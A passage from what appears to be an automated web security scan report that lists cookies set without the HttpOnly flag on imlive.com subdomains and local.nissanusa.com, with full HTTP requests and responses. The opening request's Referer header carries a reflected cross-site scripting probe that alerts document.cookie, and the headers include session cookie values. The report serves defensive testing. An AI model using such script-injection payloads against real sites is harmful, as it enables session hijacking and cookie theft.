Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:06:25 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 21541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.387. http://imlive.com/webcam-sign-up/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webcam-sign-up/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:16 GMT
Connection: close
Content-Length: 40564
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.388. http://imlive.com/wmaster.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /wmaster.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers without an HttpOnly attribute in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: homepagems3.asp
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; path=/; HttpOnly
Set-Cookie: spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 13:59:07 GMT; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; path=/
Set-Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; expires=Mon, 14-Mar-2011 13:59:07 GMT; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 13:59:06 GMT
Content-Length: 0
Set-Cookie: BIGipServerImlive=2434008642.20480.0000; path=/


11.389. http://in.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
Set-Cookie: spvdr=vd=4fbca91b-ec62-43d7-a59a-b2e914467e3f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:35 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 20907
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...

11.390. http://in.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=j0cmfjeqkgfyt5q0kkvpbq55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=j0cmfjeqkgfyt5q0kkvpbq55; path=/; HttpOnly
Set-Cookie: spvdr=vd=01af6778-d1d3-49a7-be76-9ec11b8e59e1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:44 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pin=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:24:44 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:44 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


11.391. http://it.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: spvdr=vd=d3cc5bc2-bab2-416e-acff-891f674e66d4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:49 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18113
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...

11.392. http://it.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=leuwhx55i4ysao55e3howj45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=leuwhx55i4ysao55e3howj45; path=/; HttpOnly
Set-Cookie: spvdr=vd=77d53362-f25f-48ea-b547-91e4ba6466fb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:53 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pit=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:24:53 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:53 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.393. http://jp.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: spvdr=vd=eb9d52f6-9629-4754-bdff-f15e37967440&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:02 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 19088
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...

11.394. http://jp.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dv01ap55xfvfsu45pneewj55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dv01ap55xfvfsu45pneewj55; path=/; HttpOnly
Set-Cookie: spvdr=vd=274f15f2-3053-46a8-b600-2288a0c564c6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:05 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pjp=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:05 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.395. http://local.nissanusa.com/albany-schenectady-troy-ny-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /albany-schenectady-troy-ny-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /albany-schenectady-troy-ny-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=12201; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/
Set-Cookie: localDMA=albany-schenectady-troy-ny-area; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/
Content-Length: 135768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.396. http://local.nissanusa.com/albuquerque-santa-fe-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /albuquerque-santa-fe-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /albuquerque-santa-fe-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=87101; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/
Set-Cookie: localDMA=albuquerque-santa-fe-area; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/
Content-Length: 106522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.397. http://local.nissanusa.com/atlanta-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /atlanta-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /atlanta-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=30303; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/
Set-Cookie: localDMA=atlanta-area; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/
Content-Length: 129057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.398. http://local.nissanusa.com/austin-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /austin-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /austin-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78701; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/
Set-Cookie: localDMA=austin-area; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/
Content-Length: 110636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.399. http://local.nissanusa.com/baltimore-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /baltimore-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /baltimore-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:56 GMT
Set-Cookie: localZIP=21201; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/
Set-Cookie: localDMA=baltimore-area; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/
Content-Length: 171708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.400. http://local.nissanusa.com/boston-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /boston-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boston-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:34 GMT
